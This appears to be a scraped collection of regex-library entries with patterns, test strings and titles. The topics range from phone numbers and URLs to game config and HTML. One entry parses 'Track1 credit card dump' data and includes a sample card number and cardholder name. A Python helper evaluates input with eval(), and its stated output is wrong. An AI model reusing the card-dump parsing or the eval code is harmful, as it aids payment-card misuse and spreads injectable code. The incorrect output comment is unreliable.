$('.onesignal-bell-launcher-button').trigger('click');
});
</script>
</div>
</div>
<div class="copyRes">
<!--11111113333333-->
<span class="copyright">© 1998-2019 Нет Инфо АД.</span>
<a href="http://www.netinfocompany.bg/privacy" target="_blank"
class="allrightsres">Всички права запазени</a>
</div>
<!-- Opoznai.bg -->
<script type="text/javascript">
setTimeout(function(){
var params = {
city: "Pazardzhik", // Дестинация
hometown: "0", // 1|0 - дали потребителят е от този град или не
count: "https://a.abv.bg/www/delivery/ck.php?oaparams=2__bannerid=176933__zoneid=63__oadest=" // Брояч за кликове, евентуално
};
var src = "https://b.grabo.bg/netinfo/special/sinoptik_640x85.php?affid=20493";
for(var p in params) {
src += "&"+p+"="+encodeURIComponent(params[p]);
}
var scr = document.createElement("SCRIPT");
scr.type = "text/javascript";
scr.src = src;
scr.setAttribute("async",true);
$(document.body).append(scr);
},10);
</script>
<script>
$.ajax({
type: 'GET',
url: 'https://graph.facebook.com/',
success: function (data) {
showCount(data);
}
});
function showCount(responseText) {
// Save the parsed JSON
var json = responseText;
var count = parseInt(json.share.share_count);
// Check if the response contains a 'shares' property
// If it doesn't, we can just exit this function
if (count < 1)
count = -1;
if (parseInt(count) > 0) {
$('.facebookShareNumber').text(count);
}
}
</script>
</footer>
<!---- FOOTER END ----->
</div>
<script>
$(document).ready(function () {
$('.mvr-messages span').on('click', function () {
SetCookie($(this).attr('id'), true, 30, '/', '.sinoptik.bg');
$(this).parents('li').hide();
});
});
</script>
<!-- (C)2000-2018 Gemius SA - gemiusPrism / sinoptik.bg/ -->
<script type="text/javascript">
<!--//--><![CDATA[//><!--
var pp_gemius_identifier = 'B8.q9u_DP8zSybJ0s.s1hvU2LU7FNE9hTb6VJO4dQw3.I7';
//gemius consent
var pp_gemius_dnt = 1;
// lines below shouldn't be edited
function gemius_pending(i) {
window[i] = window[i] || function () {
var x = window[i + '_pdata'] = window[i + '_pdata'] || [];
x[x.length] = arguments;
};
};gemius_pending('gemius_hit');
gemius_pending('gemius_event');
gemius_pending('pp_gemius_hit');
gemius_pending('pp_gemius_event');
(function (d, t) {
try {
var gt = d.createElement(t), s = d.getElementsByTagName(t)[0],
l = 'http' + ((location.protocol == 'https:') ? 's' : '');
gt.setAttribute('async', 'async');
gt.setAttribute('defer', 'defer');
gt.src = l + '://gabg.hit.gemius.pl/xgemius.js';
s.parentNode.insertBefore(gt, s);
} catch (e) {
}
})(document, 'script');
//--><!]]>
</script>
<!--/157018629/Sinoptik.bg/Desktop/All_pages/Hidden/RichMedia-->
<div id="div-gpt-ad-1526903420347-0"></div>
</body>
</html>
| 10 day regex FULL - 9 props | 2019-07-01T09:24:22.000Z |
|
.*?"(\w+)".*?{(.*)} | // Rewrite of Crystal Maiden Frostbite
// Author: kritth
// Date: December 31, 2015
// Version: 6.86
// Type: Datadriven
"flower_maiden_rooting_shoot"
{
// General
//-------------------------------------------------------------------------------------------------------------
"BaseClass" "ability_datadriven"
"AbilityType" "DOTA_ABILITY_TYPE_BASIC"
"AbilityBehavior" "DOTA_ABILITY_BEHAVIOR_UNIT_TARGET"
"AbilityUnitTargetTeam" "DOTA_UNIT_TARGET_TEAM_ENEMY"
"AbilityUnitTargetType" "DOTA_UNIT_TARGET_HERO | DOTA_UNIT_TARGET_BASIC"
"AbilityUnitDamageType" "DAMAGE_TYPE_MAGICAL"
"SpellImmunityType" "SPELL_IMMUNITY_ENEMIES_NO"
"FightRecapLevel" "1"
"AbilityTextureName" "rooting_shoot"
// Casting
//-------------------------------------------------------------------------------------------------------------
"AbilityCastRange" "500"
"AbilityCastPoint" "0.3 0.3 0.3 0.3"
// Time
//-------------------------------------------------------------------------------------------------------------
"AbilityCooldown" "9.0 8.0 7.0 6.0"
// Cost
//-------------------------------------------------------------------------------------------------------------
"AbilityManaCost" "115 125 140 150"
// Stats
//-------------------------------------------------------------------------------------------------------------
"AbilityModifierSupportValue" "0.5" // Applies multiple modifiers
// Special
//-------------------------------------------------------------------------------------------------------------
"AbilitySpecial"
{
"01"
{
"var_type" "FIELD_INTEGER"
"damage_per_second_tooltip" "50"
}
"02"
{
"var_type" "FIELD_FLOAT"
"duration_tooltip" "1.5 2.0 2.5 3.0"
}
"03"
{
"var_type" "FIELD_INTEGER"
"hero_damage_tooltip" "150 200 250 300"
}
"04"
{
"var_type" "FIELD_FLOAT"
"creep_duration_tooltip" "10.0 10.0 10.0 10.0"
}
"05"
{
"var_type" "FIELD_INTEGER"
"creep_damage_tooltip" "1000"
}
"06"
{
"var_type" "FIELD_FLOAT"
"damage" "100"
}
// Extra variable
"07"
{
"var_type" "FIELD_FLOAT"
"stun_duration" "0.1"
}
"08"
{
"var_type" "FIELD_FLOAT"
"damage_interval" "0.5"
}
"09"
{
"var_type" "FIELD_INTEGER"
"damage_per_second" "25"
}
"10"
{
"var_type" "FIELD_FLOAT"
"duration" "1.0 1.5 2.0 2.5"
}
"11"
{
"var_type" "FIELD_FLOAT"
"creep_duration" "9.5 9.5 9.5 9.5"
}
}
// Data driven
//-------------------------------------------------------------------------------------------------------------
"precache"
{
"soundfile" "soundevents/game_sounds_heroes/game_sounds_crystalmaiden.vsndevts"
"particle" "particles/leave_bite/leave_bite_06.vpcf"
"particle" "particles/leave_bite/leave_bite_01.vpcf"
}
"OnSpellStart"
{
"TrackingProjectile"
{
"Target" "TARGET"
"EffectName" "particles/leave_bite/leave_bite_01.vpcf"
"MoveSpeed" "2000"
}
"Stun"
{
"Target" "TARGET"
"Duration" "%stun_duration"
}
"ApplyModifier"
{
"Target"
{
"Center" "TARGET"
"Types" "DOTA_UNIT_TARGET_HERO"
}
"ModifierName" "modifier_frost_bite_root_datadriven"
"Duration" "%duration"
}
"ApplyModifier"
{
"Target"
{
"Center" "TARGET"
"Types" "DOTA_UNIT_TARGET_HERO"
}
"ModifierName" "modifier_frost_bite_damage_datadriven"
"Duration" "%duration"
}
"ApplyModifier"
{
"Target"
{
"Center" "TARGET"
"Types" "DOTA_UNIT_TARGET_BASIC"
}
"ModifierName" "modifier_frost_bite_root_datadriven"
"Duration" "%creep_duration"
}
"ApplyModifier"
{
"Target"
{
"Center" "TARGET"
"Types" "DOTA_UNIT_TARGET_BASIC"
}
"ModifierName" "modifier_frost_bite_damage_datadriven"
"Duration" "%creep_duration"
}
"FireSound"
{
"Target" "TARGET"
"EffectName" "hero_Crystal.frostbite"
}
}
"Modifiers"
{
"modifier_frost_bite_root_datadriven"
{
"IsPurgable" "1"
"EffectName" "particles/leave_bite/leave_bite_06.vpcf"
"States"
{
"MODIFIER_STATE_ROOTED" "MODIFIER_STATE_VALUE_ENABLED"
"MODIFIER_STATE_INVISIBLE" "MODIFIER_STATE_VALUE_DISABLED"
}
}
"modifier_frost_bite_damage_datadriven"
{
"IsPurgable" "1"
"IsHidden" "1"
"OnCreated"
{
"Damage"
{
"Target" "TARGET"
"Damage" "%damage_per_second"
"Type" "DAMAGE_TYPE_MAGICAL"
}
}
"ThinkInterval" "%damage_interval"
"OnIntervalThink"
{
"Damage"
{
"Target" "TARGET"
"Damage" "%damage_per_second"
"Type" "DAMAGE_TYPE_MAGICAL"
}
}
}
}
} | KV_base | 2021-01-17T17:01:13.000Z |
|
match ofstream of("test.txt", ios_base::app);
ofstream of("test.txt", ios_base::trunc);
ofstream of("test.txt", ios_base::binary); | (?P<first_part>(?:ifstream|ofstream)\s+[0-9a-zA-z_]+\s*\()(?:\"(?P<file_name>[0-9a-zA-z_.]+)\") | ifstream f1("text1.txt");
ifstream f2 ("text2.txt");
ifstream f_ASFdf1("text1");
ofstream out ("output.txt");//создали объект и сразу же открыли файл для записи
ofstream of;//создали объект класса
of.open("test.txt");//открыли файл для записи
ofstream of("test.txt", ios_base::app); //добавление информации к концу файла
ofstream of("test.txt", ios_base::trunc); //очистить содержимое файла
ofstream of("test.txt", ios_base::binary); //открыть в бинарном режиме | ofstream ifstream file C++ | 2016-01-30T08:09:26.000Z |
^[0-9]*[1-9][0-9]{10}$ | 02345678900 | 0755462021 | 2015-12-30T06:05:12.000Z |
|
The second matcher will get EE tags from $tagdata. | {(if '?{?)?(.*?)_en-us(.*?)} | {exp:channel:entries channel="" url_title="doors" limit="1"}
{exp:playa:children field="video_slider" var_prefix="videoslider"}
{if {videoslider:total_results} != '0'}
{if {videoslider:count}=='1'}
{if '{video_slider_title_en-us}'!='NULL'}
{video_slider_title_en-us}
{if:else}
Videos
{/if}
{/if}
{if video_thumb != ''}
{if:else}
{exp:url_tube:thumbnail src="{videoslider:video_file}" width="334" height="150"}
{/if}
{if video_thumb_title != ''}
{video_thumb_title}
{if:else}
{videoslider:title}
{/if}
{if {videoslider:count}=={videoslider:total_results}}
{/if}
{/exp:playa:children}
{/exp:channel:entries}
| Match Tags in ExpressionEngine | 2014-09-24T19:57:38.000Z |
https://developer.mozilla.org/es/
Url regex that capture the domain of the URL | (?:http|https):\/\/((?:[\w-]+)(?:\.[\w-]+)+)(?:[\w.,@?^=%&:\/~+#-]*[\w@?^=%&\/~+#-])? | http://www.es.pornhub.com/
http://es.cumlouder.com/?nats=MTkzOC4xLjIuMi4wLjAuMC4wLjA
http://www.pornotube.com/orientation/straight/home/page/1
http://rubias19.com/
http://www.elreyx.com/
http://www.puritanas.com/
http://www.xvideos.com/
http://es.xhamster.com/
http://www.redtube.com/
http://es.cam4.com/
https://es.chaturbate.com/
http://new.bangbros.com/home.htm
http://www.brazzers.com/home/?nats=NDc1NzAzOjQ5MzoyNA,0,0,0,0
http://www.petardas.com/
http://www.poringa.net/
http://foxtube.com/
http://www.tubewolf.com/
http://www.youporn.com/
http://www.putalocura.com/
http://www.serviporno.com/
http://www.toropornohd.com/
http://www.aztepajas.com/
http://pornfun.com/ | Url regex that capture the domain of the URL | 2015-11-26T22:37:40.000Z |
Matches CNPJ, which is an identification number issued to Brazilian companies. | \d{2}\.\d{3}\.\d{3}\/\d{4}-\d{2} | CNPJ - brazilian company identifier number | 2015-02-11T13:08:19.000Z |
|
Determines whether a filename is a WMO group file or not. | ^.+_[0-9]{3}\.wmo$ | DuskwooAbandoned_Barn.wmo
DuskwooAbandoned_Barn_000.wmo
DuskwooAbandoned_Barn_001.wmo
DuskwooAbandoned_Barn_002.wmo
DuskwooAbandoned_Barn01.wmo
DuskwooAbandoned_Barn01_000.wmo
DuskwooAbandoned_Barn_01.wmo
DuskwooAbandoned_Barn_01_000.wmo | WMO Group File Detector | 2016-04-12T19:10:29.000Z |
^(.+?)\ *=\ *(.*) | #INFOFILE1.1 - Do not remove this line!
FileIdent = CarMaker-Plugins 1
FileCreator = CarMaker 2014-12-18 08:00:00
## Plugins #############################################################
VehicleControl.ZMS = 1
VehicleControl.ZMS.Info = ZMS
Brake.MyBrake_FMU = 1
Brake.MyBrake_FMU.Info = MyBrake_FMU
PTClutch.MyClutch_FMU = 1
PTClutch.MyClutch_FMU.Info = MyClutch_FMU
VehicleControl.MyVehicleControl_FMU = 1
VehicleControl.MyVehicleControl_FMU.Info = MyVehicleControl_FMU | parser = | 2015-07-28T13:47:54.000Z |
|
Just checks for two capitalized words separated by a string | ([A-Z][\w]* [A-Z][\w]*) | Names | 2016-01-14T16:29:31.000Z |
|
URL Pattern Django | ^download\/(?P<doc>[^\/]+)[|\/]{0,1}(?P<mode>[\w]{0,})[|\/]{0,1}$ | download/uuid_file.pdf/modeset1
download/uuid_file.pdf/modeset1/
download/uuid_file.pdf/
download/uuid_file.pdf | URL Pattern Django | 2023-05-02T20:06:19.000Z |
^(?:(?:\(?(?:00|\+)([1-4]\d\d|[1-9]\d?)\)?)?[\-\.\ \\\/]?)?((?:\(?\d{1,}\)?[\-\.\ \\\/]?){5,})(?:[\-\.\ \\\/]?(?:#|ext\.?|extension|x)[\-\.\ \\\/]?(\d+))?$ | phone valid | 2015-07-21T17:06:10.000Z |
||
Strip Android Logs of Date/Time and process. This helps if you want to diff 2 logs and remove the different date/time and process numbers | \d+-\d+.\d{2}:\d{2}:\d{2}\.\d*\s*\d*\s*\d*\s*[A-Z] | Strip Android Logs of Date/Time and process | 2017-01-04T19:15:57.000Z |
|
Replaces ^ with Math.pow function call. This assumes all braces have been combined first. If you need help with the combination, I got you—try this Python algorithm:
```py
def evaluate_braces(expr):
"""Recursively evaluate expressions within braces"""
# Check if expression contains braces
if '(' in expr:
# Find the innermost set of braces
left = expr.rfind('(')
right = left + expr[left:].find(')')
# Evaluate the expression within the braces
result = eval(expr[left+1:right])
# Replace the expression within the braces with its result
expr = expr[:left] + str(result) + expr[right+1:]
# Recursively evaluate any remaining expressions within braces
expr = evaluate_braces(expr)
# Evaluate the final expression
return expr
expression = "31+((4+1)+2*7)*2"
result = evaluate_braces(expression)
print(result) # Output: 2+2+3+4*8/2
``` | (-?[.0-9]+)\^(-?[.0-9]+) | 5^2
8*6^-8
7/6^8+7
7/1.5^8+7-8
.4^0.4
.4+^0.4 (invalid)
5400^.5+2
4.^.5 | Replace ^ with Math.pow function. Not made to work with braces. | 2023-03-15T22:00:21.000Z |
Captures group that is either AMEX, MC, or Visa with or without start and end sentinels including discretionary data after section for name
Does not support 13 digit credit cards, as they are not used anymore. Only allows for 15 digit AMEX and 16 digit Visa or MC | (?:%?B[3-5][0-9]{14,15}\^[a-zA-Z0-9 \/]{2,26}\^(2|3)[0-9](01|02|03|04|05|06|07|08|09|10|11|12)[0-9 ]{6,34}\??) | %B4455000000660490^FARNSWORTH/SHANE ^24102010001090100001?ass
B4455000000660490^FARNSWORTH/SHANE ^24102010001090100001aaaaaaaaaa=B4455000000660490^FARNSWORTH/SHANE ^24102010001090100001as%B4455000000660490^FARNSWORTH/SHANE ^24102010001090100001? | Track1 credit card dump | 2021-12-30T12:14:35.000Z |
Regex for German phones (without +) | ^((00|0)?49[1-9]{1}[0-9]{8,10})$ | German Phones | 2023-10-04T08:48:18.000Z |
|
(\+97[\s]{0,1}[\-]{0,1}[\s]{0,1}1|0)50[\s]{0,1}[\-]{0,1}[\s]{0,1}[1-9]{1}[0-9]{6} | Matches (mobile)
+97150 3827741 | 0503827741 | 050-3827741
Non-Matches
040 3827741 | 05 3827741 | 050_______spaces_______3827741
Matches (land)
04 3452488 | 04 -3452488 | 04 - 3452499
Non-Matches
01 -3452488 | 04 34524888 | 04 3452488
Other tests
+97150 3827741 | +97150 3827741 | UAE Phone Numbers | 2015-05-30T22:22:43.000Z |
|
Extracts HTML tags, HTML entities, alphanumeric words, and the rest. | (&[A-Za-z]+?;)|(<.+?>)|(<\/\w+>)|([\w-]+)|([ ~!@#$%^&*()+=?:;"{}\[\]|,.\\/]+) | This is more<p>Post server upgrade test on 9/13</p><p>Testing c360 release</p><p> </p><p><span title=\"Deleted by Chris Courtney - 12/16/2015 3:22pm\" class=\"del cts-1 non-editable\" data-mce-contenteditable=\"false\" data-time=\"1450297379217\" data-username=\"Chris Courtney\" data-userid=\"4642\" data-cid=\"4\">wifi</span><span title=\"Inserted by Chris Courtney - 12/16/2015 3:23pm\" class=\"ins cts-1\" data-time=\"1450297385376\" data-username=\"Chris Courtney\" data-userid=\"4642\" data-cid=\"8\">Life Preserver will</span> save <span title=\"Inserted by Chris Courtney - 12/16/2015 3:23pm\" class=\"ins cts-1\" data-time=\"1450297399510\" data-username=\"Chris Courtney\" data-userid=\"4642\" data-cid=\"28\">if the </span>internet cut<span title=\"Inserted by Chris Courtney - 12/16/2015 3:23pm\" class=\"ins cts-1\" data-time=\"1450297404606\" data-username=\"Chris Courtney\" data-userid=\"4642\" data-cid=\"35\">s </span>out<span title=\"Inserted by Chris Courtney - 12/16/2015 3:23pm\" class=\"ins cts-1\" data-time=\"1450297409071\" data-username=\"Chris Courtney\" data-userid=\"4642\" data-cid=\"42\">.</span><span title=\"Deleted by Chris Courtney - 12/16/2015 3:23pm\" class=\"del cts-1 non-editable\" data-mce-contenteditable=\"false\" data-time=\"1450297406872\" data-username=\"Chris Courtney\" data-userid=\"4642\" data-cid=\"37\"> test</span></p><p> </p><p>The Subject Property is owned by the Federal Deposit Insurance Corporation (FDIC) and consists of 10 Acres acres and is located on the [N/E/S/W] side of 440 Wheelers Farms Road, approximately [###] feet [N/E/S/W] of the intersection of between[STREETNAME] and [].porperty ocne upon a tmie The Subject Property is not currently occupied by [BRIEFLY DESCRIBE BUILDING, OCCUPANT AND USE]. This is me entering new text into 2.1. This is a bullet. Type text 123 spelling</p><p> </p><p>The Subject Property is owned by the <span title=\"Deleted by Chris Courtney\" class=\"trackChanges\">Federal Deposit Insurance Corporation</span> (FDIC) and consists of 10 Acres acres and is located on the [N/E/S/W] side of 440 Wheelers Farms Road, approximately [###] feet [N/E/S/W] of the intersection of between[STREETNAME] and []. The Subject Property is not currently occupied by [BRIEFLY DESCRIBE BUILDING, OCCUPANT AND USE]. This is me entering new text into 2.1.</p><p> </p><p>This is a bullet.EDR order right after (discussed geocoding concerns, we're all set there) test</p><p> </p><p>Type text 123 spelling The Subject Property is owned by the Federal Deposit Insurance Corporation (FDIC) and consists of 10 Acres acres and is located on the [N/E/S/W] side of 440 Wheelers Farms Road, approximately [###] feet [N/E/S/W] of the intersection of<span title=\"Added by Chris Courtney\" class=\"trackChanges\">/</span><span title=\"Deleted by Chris Courtney\" class=\"trackChanges\"> </span>between[STREETNAME] and [].</p><p> </p><p> </p><p>The Subject Property is not currently occupied by [BRIEFLY DESCRIBE BUILDING, OCCUPANT AND USE].</p><p>This is me entering new text into 2.1. test</p><p> </p><p>This is a bullet.</p><p> </p><p>Type text 123 spellingThe Subject Property is owned by the Federal Deposit Insurance Corporation (FDIC) and consists of 10 Acres acres and is located on the [N/E/S/W] side of 440 Wheelers Farms Road, approximately [###] feet [N/E/S/W] of the intersection of between[STREETNAME] and [].</p><p> </p><p> </p><p>The Subject Property is not currently occupied by [BRIEFLY DESCRIBE BUILDING, OCCUPANT AND USE].</p><p>This is me entering new text into 2.1.</p><p> </p><p>This is a bullet.</p><p> </p><p>Type text 123 spellingThe Subject Property is owned by the Federal Deposit Insurance Corporation (FDIC) and consists of 10 Acres acres and is located on the [N/E/S/W] side of 440 Wheelers Farms Road, approximately [###] feet [N/E/S/W] of the intersection of between[STREETNAME] and [].</p><p> </p><p> </p><p>The Subject Property is not currently occupied by [BRIEFLY DESCRIBE BUILDING, OCCUPANT AND USE].</p><p>This is me entering new text into 2.1.</p><p> </p><p>This is a bullet.</p><p> </p><p>Type text 123 spellingThe Subject Property is owned by the Federal Deposit Insurance Corporation (FDIC) and consists of 10 Acres acres and is located on the [N/E/S/W] side of 440 Wheelers Farms Road, approximately [###] feet [N/E/S/W] of the intersection of between[STREETNAME] and [].</p><p> </p><p> </p><p>The Subject Property is not currentl<span title=\"Inserted by Chris Courtney - 06/12/2015 2:40pm\" class=\"ins cts-1\" data-time=\"1434134407587\" data-username=\"Chris Courtney\" data-userid=\"4642\" data-cid=\"2\">y</span> <span title=\"Inserted by Chris Courtney - 06/12/2015 2:40pm\" class=\"ins cts-1\" data-time=\"1434134414659\" data-username=\"Chris Courtney\" data-userid=\"4642\" data-cid=\"3\">this is a test. </span>occupied by [BRIEFLY DESCRIBE BUILDING, OCCUPANT AND USE].</p><p>This is me entering new text into 2.1.</p><p> </p><p>This is a bullet.</p><p> </p><p>Type text 123 spelling</p><p> </p><p>2014 Schultz Motors of Milan<br> 2009-2008 Dive Rite<br> Procom Driving Services<br> Schultz Motors of Milan - New and Used<br> Schultz Motors of Milan -Part and Service<br> 2004-2003 Adventure Driving<br> Dive Rite<br> Procom Driving Services<br> Schultz Motors of Milan - New and Used<br> Schultz Motors of Milan -Part and Service<br> 1999-1998 Dive Rite<br> Procom Driving Services<br> Schultz Motors of Milan - New and Used<br> 1994-1983 Schultz Motors<br> 1979-1967 Bruckner Oldsmobile</p><p> </p><p> 132543467</p><p> </p><p> </p><p> </p><p> </p>Heh? | Split HTML string | 2016-01-09T04:21:02.000Z |
stackoverflow question | ^([\s\S]*?)\n#Guest(?:\n.*){3} | set wlan vap SSID enable
set wlan enable
#Guest Wireless (Password must be 8-64 characters)
add wlan vap ssid
set wlan vap security-type WPA/WPA2
| remove n lines after matching pattern | 2015-08-12T20:23:17.000Z |
eee | Military\n\s+([0-9,]+)\n\s+\+([0-9.]+)% Magic Effectiveness Rune Production\n\s+([0-9,]+) | Military
914,519
+97.5% Magic Effectiveness Rune Production
0 | eee | 2015-04-10T19:31:29.000Z |
regcergtecrhcethgeargerer | ^(?=.*property="og:image").*content="(?P<content>[^"]+)".*$ | <!DOCTYPE html><html lang="en" data-cast-api-enabled="true"><head><script>var ytcsi = {gt: function(n) {n = (n || '') + 'data_';return ytcsi[n] || (ytcsi[n] = {tick: {},span: {},info: {}});},tick: function(l, t, n) {ytcsi.gt(n).tick[l] = t || +new Date();},span: function(l, s, n) {ytcsi.gt(n).span[l] = (typeof s == 'number') ? s :+new Date() - ytcsi.data_.tick[l];},info: function(k, v, n) {ytcsi.gt(n).info[k] = v;}};ytcsi.perf = window.performance || window.mozPerformance ||window.msPerformance || window.webkitPerformance;ytcsi.tick('_start', ytcsi.perf ? ytcsi.perf.timing.responseStart : null);if (document.webkitVisibilityState == 'prerender') {ytcsi.info('prerender', 1);document.addEventListener('webkitvisibilitychange', function() {ytcsi.tick('_start');}, false);}</script> <script>
try {window.ytbuffer = {};ytbuffer.handleClick = function(e) {var element = e.target || e.srcElement;while (element.parentElement) {if (element.className.match(/(^| )yt-can-buffer( |$)/)) {window.ytbuffer = {bufferedClick: e};element.className += ' yt-is-buffered';break;}element = element.parentElement;}};if (document.addEventListener) {document.addEventListener('click', ytbuffer.handleClick);} else {document.attachEvent('onclick', ytbuffer.handleClick);}} catch(e) {}
(function(){function b(k,g){var a,d;g?a=!0:document.getElementById("c4-custom-tab-iframe")?(document.body.className+=" exp-wider-browse",a=!0):a=!1;a?(a=1056,d=1262):(a=951,d=1136);var c=(window.innerWidth||document.documentElement.clientWidth)-21-50;1251<=(window.innerWidth||document.documentElement.clientWidth)&&k&&(c-=230);return c>=d?"content-snap-width-3":c>=a?"content-snap-width-2":"content-snap-width-1"};function e(k,g,a,d){var c=document.getElementsByTagName("html")[0],h=[c.className];k&&1251<=(window.innerWidth||document.documentElement.clientWidth)&&(h.push("guide-pinned"),g&&h.push("show-guide"));a&&h.push(" ",b(g,d));c.className=h.join(" ")}var f=["yt","www","masthead","sizing","runBeforeBodyIsReady"],l=this;f[0]in l||!l.execScript||l.execScript("var "+f[0]);for(var m;f.length&&(m=f.shift());)f.length||void 0===e?l[m]?l=l[m]:l=l[m]={}:l[m]=e;})();
yt.www.masthead.sizing.runBeforeBodyIsReady(false,true,false,false);
</script>
<script src="//s.ytimg.com/yts/jsbin/www-scheduler-vflKNUgKf.js" name="www-scheduler"></script>
<script>var ytimg = {};ytimg.count = 1;ytimg.preload = function(src) {var img = new Image();var count = ++ytimg.count;ytimg[count] = img;img.onload = img.onerror = function() {delete ytimg[count];};img.src = src;};</script>
<link rel="stylesheet" href="//s.ytimg.com/yts/cssbin/www-core-webp-vflMmJby1.css" name="www-core">
<script>if (window.ytcsi) {window.ytcsi.tick("ce", null, '');}</script>
<script>ytimg.preload("https:\/\/r1---sn-j5caxvox-45ge.googlevideo.com\/crossdomain.xml");ytimg.preload("https:\/\/r1---sn-j5caxvox-45ge.googlevideo.com\/generate_204");</script>
<script src="//s.ytimg.com/yts/jsbin/html5player-en_US-vflxrHvBh.js" name="html5player"></script>
<script>
if (window.ytcsi && ytcsi.perf) {
ytcsi.info('h5jse', ytcsi.perf.now());
}
</script>
<link rel="stylesheet" href="//s.ytimg.com/yts/cssbin/www-player-webp-vfl3tXgxf.css" name="www-player">
<title>DS Factors Android v3 1 - YouTube</title><link rel="search" type="application/opensearchdescription+xml" href="http://www.youtube.com/opensearch?locale=en_US" title="YouTube Video Search"><link rel="shortcut icon" href="https://s.ytimg.com/yts/img/favicon-vfldLzJxy.ico" type="image/x-icon"> <link rel="icon" href="//s.ytimg.com/yts/img/favicon_32-vflWoMFGx.png" sizes="32x32"><link rel="canonical" href="http://www.youtube.com/watch?v=EisQGYxhI1U"><link rel="alternate" media="handheld" href="http://m.youtube.com/watch?v=EisQGYxhI1U"><link rel="alternate" media="only screen and (max-width: 640px)" href="http://m.youtube.com/watch?v=EisQGYxhI1U"><link rel="shortlink" href="http://youtu.be/EisQGYxhI1U"> <meta name="title" content="DS Factors Android v3 1">
<meta name="description" content="D&S Factors has gone mobile! This short video has step by step instructions to download & install the app on your android phone.">
<meta name="keywords" content="">
<link rel="alternate" type="application/json+oembed" href="http://www.youtube.com/oembed?url=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DEisQGYxhI1U&format=json" title="DS Factors Android v3 1">
<link rel="alternate" type="text/xml+oembed" href="http://www.youtube.com/oembed?url=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DEisQGYxhI1U&format=xml" title="DS Factors Android v3 1">
<meta property="og:site_name" content="YouTube">
<meta property="og:url" content="http://www.youtube.com/watch?v=EisQGYxhI1U">
<meta property="og:title" content="DS Factors Android v3 1">
<meta property="og:image" content="https://i1.ytimg.com/vi/EisQGYxhI1U/maxresdefault.jpg">
<meta property="og:description" content="D&S Factors has gone mobile! This short video has step by step instructions to download & install the app on your android phone.">
<meta property="al:ios:app_store_id" content="544007664">
<meta property="al:ios:app_name" content="YouTube">
<meta property="al:ios:url" content="vnd.youtube://watch/EisQGYxhI1U">
<meta property="al:android:url" content="http://www.youtube.com/watch?v=EisQGYxhI1U&feature=applinks">
<meta property="al:android:app_name" content="YouTube">
<meta property="al:android:package" content="com.google.android.youtube">
<meta property="al:web:url" content="http://www.youtube.com/watch?v=EisQGYxhI1U&feature=applinks">
<meta property="og:type" content="video">
<meta property="og:video" content="http://www.youtube.com/v/EisQGYxhI1U?version=3&autohide=1">
<meta property="og:video:type" content="application/x-shockwave-flash">
<meta property="og:video:width" content="1280">
<meta property="og:video:height" content="720">
<meta property="fb:app_id" content="87741124305">
<meta name="twitter:card" content="player">
<meta name="twitter:site" content="@youtube">
<meta name="twitter:url" content="http://www.youtube.com/watch?v=EisQGYxhI1U">
<meta name="twitter:title" content="DS Factors Android v3 1">
<meta name="twitter:description" content="D&S Factors has gone mobile! This short video has step by step instructions to download & install the app on your android phone.">
<meta name="twitter:image" content="https://i1.ytimg.com/vi/EisQGYxhI1U/maxresdefault.jpg">
<meta name="twitter:app:name:iphone" content="YouTube">
<meta name="twitter:app:id:iphone" content="544007664">
<meta name="twitter:app:name:ipad" content="YouTube">
<meta name="twitter:app:id:ipad" content="544007664">
<meta name="twitter:app:url:iphone" content="vnd.youtube://watch/EisQGYxhI1U">
<meta name="twitter:app:url:ipad" content="vnd.youtube://watch/EisQGYxhI1U">
<meta name="twitter:app:name:googleplay" content="YouTube">
<meta name="twitter:app:id:googleplay" content="com.google.android.youtube">
<meta name="twitter:app:url:googleplay" content="http://www.youtube.com/watch?v=EisQGYxhI1U">
<meta name="twitter:player" content="https://www.youtube.com/embed/EisQGYxhI1U">
<meta name="twitter:player:width" content="1280">
<meta name="twitter:player:height" content="720">
<link rel="stylesheet" href="//s.ytimg.com/yts/cssbin/www-pageframe-webp-vfl_BIyVg.css" name="www-pageframe">
<script>if (window.ytcsi) {window.ytcsi.tick("cl", null, '');}</script></head> <body dir="ltr" class=" ltr webkit webkit-537 site-center-aligned site-as-giant-card appbar-hidden not-nirvana-dogfood not-watch8 delayed-frame-styles-not-in " id="body">
<div id="early-body"></div>
<div id="body-container"><form name="logoutForm" method="POST" action="/logout"><input type="hidden" name="action_logout" value="1"></form><div id="masthead-positioner">
<div id="yt-masthead-container" class="yt-grid-box yt-base-gutter"><div id="yt-masthead" class=""><div class="yt-masthead-logo-container "> <a id="logo-container" href="/" title="YouTube home" class=" spf-link
"><img id="logo" src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" alt="YouTube home"></a>
<div id="appbar-guide-button-container">
<button class="yt-uix-button yt-uix-button-size-default yt-uix-button-text yt-uix-button-empty yt-uix-button-has-icon appbar-guide-toggle appbar-guide-clickable-ancestor" type="button" onclick=";return false;" id="appbar-guide-button" aria-label="Guide"><span class="yt-uix-button-icon-wrapper"><img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" class="yt-uix-button-icon yt-uix-button-icon-appbar-guide"></span><img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" class="yt-uix-button-arrow"></button>
<div id="appbar-guide-button-notification-check" class="yt-valign">
<img src="https://s.ytimg.com/yts/img/pixel-vfl3z5WfW.gif" class="appbar-guide-notification-icon yt-valign-content">
</div>
</div>
<div id="appbar-main-guide-notification-container"></div>
</div><div id="yt-masthead-signin"><span id="appbar-onebar-upload-group" class="yt-uix-button-group"><a href="//www.youtube.com/upload" class="yt-uix-button yt-uix-sessionlink yt-uix-button-default yt-uix-button-size-default" data-sessionlink="feature=mhsb&ei=gHmgU6rPMMah-AOzuIDwAg" id="upload-btn"><span class="yt-uix-button-content">Upload </span></a></span><button class="yt-uix-button yt-uix-button-size-default yt-uix-button-primary" type="button" onclick=";window.location.href=this.getAttribute('href');return false;" href="https://accounts.google.com/ServiceLogin?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26feature%3Dsign_in_button%26hl%3Den%26next%3D%252Fwatch%253Fv%253DEisQGYxhI1U&passive=true&uilel=3&hl=en&service=youtube"><span class="yt-uix-button-content">Sign in </span></button></div><div id="yt-masthead-content"><form id="masthead-search" class="search-form consolidated-form" action="/results" onsubmit="if (_gel('masthead-search-term').value == '') return false;"><button class="yt-uix-button yt-uix-button-size-default yt-uix-button-default search-btn-component search-button" type="submit" onclick="if (_gel('masthead-search-term').value == '') return false; _gel('masthead-search').submit(); return false;;return true;" 